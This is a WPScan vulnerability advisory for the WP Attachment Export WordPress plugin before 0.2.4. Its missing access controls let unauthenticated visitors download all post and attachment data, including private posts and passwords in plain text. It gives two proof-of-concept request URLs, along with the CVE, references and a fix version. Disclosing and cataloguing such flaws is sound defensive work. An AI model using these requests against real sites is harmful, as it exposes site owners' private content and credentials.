WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Attachment Export < 0.2.4 - Unauthenticated Posts Download

Description

The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress
powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.

Proof of Concept

Download attachment details: http://localhost/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true

Download Wordpress content details: http://localhost/wp-admin/tools.php?content=&wp-attachment-export-download=true

Affects Plugins

wp-attachment-export
Fixed in version 0.2.4

References

CVE
CVE-2015-20067
URL
https://seclists.org/fulldisclosure/2015/Jul/73
URL
https://packetstormsecurity.com/files/132693/
URL
https://github.com/espreto/wpsploit/blob/master/modules/auxiliary/scanner/http/wp_attachment_export_file_download.rb

Classification

Type

ACCESS CONTROLS

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

Nitin Venkatesh

Submitter

ethicalhack3r

Submitter twitter
ethicalhack3r
Verified

Yes

WPVDB ID
d1a9ed65-baf3-4c85-b077-1f37d8c7793a

Timeline

Publicly Published

2015-07-15 (about 6 years ago)

Added

2015-07-15 (about 6 years ago)

Last Updated

2022-04-08 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin